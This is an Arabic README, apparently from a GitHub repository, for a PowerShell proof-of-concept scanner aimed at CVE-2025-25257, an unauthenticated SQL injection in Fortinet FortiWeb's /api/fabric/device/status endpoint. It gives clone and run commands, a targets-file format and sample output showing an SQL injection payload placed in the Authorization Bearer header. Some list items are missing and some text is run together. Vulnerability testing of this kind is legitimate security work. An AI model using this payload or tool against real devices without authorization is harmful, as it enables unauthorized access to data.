
CVE-2025-25257 PoC للأغراض التعليمية و/أو اختبار الاختراق المصرح به.
تم تصميم هذا السكربت PowerShell لأغراض اختبار الاختراق المصرح به فقط. يختبر أجهزة Fortinet FortiWeb بحثًا عن CVE-2025-25257، وهي ثغرة حقن SQL غير مصادق عليها في نقطة النهاية /api/fabric/device/status.
يقوم السكربت بما يلي:
إخلاء مسؤولية مهم:
هذه الأداة مخصصة حصريًا للاستخدام الأخلاقي المصرح به في سيناريوهات اختبار الاختراق أو تقييم الثغرات الأمنية. قد ينتهك الاستخدام غير المصرح به قوانين مثل قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) أو اللوائح المماثلة في منطقتك. تأكد من حصولك على إذن صريح من مالك الهدف قبل تشغيل هذا السكربت. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.
Invoke-WebRequest المدمج.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
يقع السكربت في script.ps1.
شغّل السكربت من PowerShell باستخدام أحد الخيارات التالية:
حدد عنوان IP أو اسم DNS واحد، مع منفذ اختياريًا (مثل: 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
أو بدون منفذ (يفحص المنافذ الافتراضية):
.\script.ps1 -Target "example.com"
وفّر ملفًا نصيًا بهدف واحد في كل سطر (مثل: targets.txt).
.\script.ps1 -InputFile "targets.txt"
مثال على محتوى targets.txt:
192.168.1.1:443
example.com
10.0.0.1
سيُخرج السكربت نتائج لكل هدف ومنفذ، بما في ذلك:
مثال على الإخراج:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).المساهمات مرحب بها! يرجى عمل fork للمستودع وتقديم طلب سحب (pull request) مع التحسينات أو إصلاحات الأخطاء أو الميزات الإضافية.
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
للاستفسارات أو المشكلات، افتح issue على GitHub.